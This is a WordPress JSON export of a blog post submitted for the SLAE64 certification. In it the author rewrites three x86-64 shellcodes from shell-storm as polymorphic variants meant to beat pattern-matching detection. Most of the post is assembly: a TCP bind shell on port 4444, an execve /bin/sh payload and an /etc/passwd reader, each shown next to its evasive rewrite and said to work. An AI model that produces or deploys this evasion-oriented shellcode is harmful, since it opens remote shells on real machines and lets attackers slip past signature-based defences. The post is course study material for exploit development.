{"id":153,"date":"2021-10-10T20:29:50","date_gmt":"2021-10-10T18:29:50","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=153"},"modified":"2021-10-10T21:14:12","modified_gmt":"2021-10-10T19:14:12","slug":"slae64-assignment-6-polymorphic-shellcode","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/10\/10\/slae64-assignment-6-polymorphic-shellcode\/","title":{"rendered":"SLAE64: Assignment 6 – Polymorphic Shellcode"},"content":{"rendered":"\n

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification:<\/p>\n\n\n\n

https:\/\/www.pentesteracademy.com\/course?id=7<\/a><\/p>\n\n\n\n

Student-ID: PA-15847<\/strong><\/p>\n\n\n\n

The Objectives for the Assignment:<\/p>\n\n\n\n

- Take up 3 shellcode from shell-storm and create polymorphic versions of them to beat pattern matching
- the polymorphic versions cannot be larger 150% of the existing shellcode
- bonus points for making it shorter in length than original<\/code><\/p>\n\n\n\n

The first shellcode is TCP Bind Shell: <\/p>\n\n\n\n

http:\/\/shell-storm.org\/shellcode\/files\/shellcode-858.php<\/p>\n\n\n\n

1.1 Here’s the original code for the first syscall:<\/p>\n\n\n\n

xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
xor r8,r8
push 0x2
pop rdi
push 0x1
pop rsi
push 0x6
pop rdx
push 0x29
pop rax
syscall<\/strong><\/code><\/p>\n\n\n\n

1.2 Here’s the replacement for the syscall socket()<\/p>\n\n\n\n

xor rax,rax\nadd al, 0x29 ;41:syscall number\nxor rdi,rdi\nadd rdi,0x2 ;2:AF_INET\nxor rsi,rsi\ninc rsi     ;1:SOCK_STREAM\nxor rdx,rdx ;0:INADDR_ANY\nsyscall\nmov rdi,rax<\/code><\/strong><\/code><\/pre>\n\n\n\n
2.1 The next part is actually nothing but syscall bind()<\/p>\n\n\n\n
mov r8,rax
xor r10,r10
push r10
push r10
mov BYTE PTR [rsp],0x2
mov WORD PTR [rsp+0x2],0x697a
mov rsi,rsp
push r8
pop rdi
push 0x10
pop rdx
push 0x31
pop rax
syscall<\/code><\/strong><\/p>\n\n\n\n
2.2. Let’s replace it as we wrote in the first assignment<\/p>\n\n\n\n
xor rax, rax \npush rax\npush rax            ;0.0.0.0\npush word 0x5C11    ;port 4444\npush word 0x02      ;2:AF_INET\nmov rsi,rsp\nadd rdx,0x10        ;16:length\nadd al, 0x31        ;49:syscall bind\nsyscall<\/code><\/strong><\/code><\/pre>\n\n\n\n
3.1 The next part seems syscall listen from the 0x32<\/p>\n\n\n\n
push r8
pop rdi
push 0x1
pop rsi
push 0x32
pop rax
syscall<\/code><\/strong><\/p>\n\n\n\n
3.2 We can replace it with our original code<\/p>\n\n\n\n
xor rax,rax\nadd al, 0x32    ;50:syscall listen\nxor rsi,rsi\ninc rsi         ;1:backlog\nsyscall<\/code><\/strong><\/code><\/pre>\n\n\n\n
4.1 The next section seems syscall accept with 0x2b<\/p>\n\n\n\n
mov rsi,rsp
xor rcx,rcx
mov cl,0x10
push rcx
mov rdx,rsp
push r8
pop rdi
push 0x2b
pop rax
syscall<\/code><\/strong><\/p>\n\n\n\n
4.2 We’ll replace it with our original code<\/p>\n\n\n\n
xor rax,rax\nadd al, 0x2b    ;43:syscall accept\nxor rsi,rsi     ;0:rsi\nmov rdx,rsi     ;0:rdx\nsyscall\nmov r15,rax     <\/code><\/strong><\/code><\/pre>\n\n\n\n
5.1 This one can be replaced with our dup2() syscall<\/p>\n\n\n\n
pop rcx
xor r9,r9
mov r9,rax
mov rdi,r9
xor rsi,rsi
push 0x3
pop rsi
dec rsi
push 0x21
pop rax
syscall<\/code><\/strong><\/p>\n\n\n\n
5.2 Here’s the replacement<\/p>\n\n\n\n
xor rsi,rsi\nadd rsi, 0x02   ;counter with fd\nmov rdi, r15    ;socket handle that we saved before\n\nloop:\n    xor rax,rax\n    add al,0x21  ;33:syscall dup2\n    syscall\n    dec rsi\n    jns loop<\/code><\/strong><\/code><\/pre>\n\n\n\n
6.1 Here’s the last part of the original shellcode<\/p>\n\n\n\n
jne 4000ef
xor rdi,rdi
push rdi
push rdi
pop rsi
pop rdx
movabs rdi,0x68732f6e69622f2f
shr rdi,0x8
push rdi
push rsp
pop rdi
push 0x3b
pop rax
syscall<\/code><\/strong><\/p>\n\n\n\n
6.2 We’ll replace this one with Syscall execve()<\/p>\n\n\n\n
xor rax, rax        \nadd rax, 59\n\nxor r9, r9\npush r9\n\nmov rbx, 0x68732f6e69622f2f    ;\/bin\/\/sh in reverse\npush rbx \n\nmov rdi, rsp\npush r9\nmov rdx, rsp\n\npush rdi\nmov  rsi, rsp\nsyscall<\/code><\/strong><\/code><\/pre>\n\n\n\n
The second shellcode is Execve \/bin\/sh: <\/p>\n\n\n\n
http:\/\/shell-storm.org\/shellcode\/files\/shellcode-603.php<\/p>\n\n\n\n
xor  rdx, rdx\nmov  qword rbx, '\/\/bin\/sh'\nshr  rbx, 0x8\n\npush rbx\nmov  rdi, rsp\npush rax\npush rdi\nmov  rsi, rsp\nmov  al, 0x3b\nsyscall<\/code><\/strong><\/code><\/pre>\n\n\n\n
We can easily modify the first 3 lines as below:
<\/p>\n\n\n\n
;; xor rdx, rdx\nsub rdx, rdx\npush rdx\n\n;; mov  qword rbx, '\/\/bin\/sh'\nmov rbx, 0x68732f2f6e696201\n\n;; shr  rbx, 0x8\nadd rbx, 0x2e<\/strong><\/code><\/code><\/pre>\n\n\n\n
The 3rd shellcode is cat \/etc\/passwd: <\/p>\n\n\n\n
http:\/\/shell-storm.org\/shellcode\/files\/shellcode-878.php<\/p>\n\n\n\n
I’ve included the original code from shell-storm below and replaced some of the lines by commenting the original lines<\/p>\n\n\n\n
<\/div><\/div>\n\n\n\n
_start:\njmp _push_filename\n  \n_readfile:\npop rdi \n; xor byte [rdi + 11], 0x41\n; xor rax, rax<\/strong>\nxor rsi, rsi\npush rsi\npush   0x2\t\n; add al, 2\npop    rax\n; xor rsi, rsi \t\t\nsyscall<\/strong>\n  \nsub sp, 0xfff\nlea rsi, [rsp]\nmov rdi, rax\nxor rdx, rdx\n;xor rax, rax\nmov rax, rdx\nmov dx, 0xfff \nsyscall\n  \nxor rdi, rdi\n;add dil, 1 \ninc rdi<\/strong>\nmov rdx, rax\n;xor rax, rax\n;add al, 1\nmov rdi, rax<\/strong>\nsyscall\n  \nxor rax, rax\nadd al, 60\nsyscall\n  \n_push_filename:\ncall _readfile\npath: db \"\/etc\/passwd\"<\/code><\/pre>\n\n\n\n
All of them are smaller in size and working as intended. \ud83d\ude42 <\/p>\n\n\n\n
You can find the full code in my Github repository:<\/p>\n\n\n\n
https:\/\/github.com\/areyou1or0\/SLAE64\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification: https:\/\/www.pentesteracademy.com\/course?id=7 Student-ID: PA-15847 The Objectives for the Assignment: – Take up 3 shellcode from shell-storm and create polymorphic versions of them to beat pattern matching- the polymorphic versions cannot be larger 150% of the existing shellcode- bonus points… Continue reading SLAE64: Assignment 6 – Polymorphic Shellcode<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[20],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/153"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=153"}],"version-history":[{"count":2,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/153\/revisions"}],"predecessor-version":[{"id":163,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/153\/revisions\/163"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=153"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=153"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=153"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}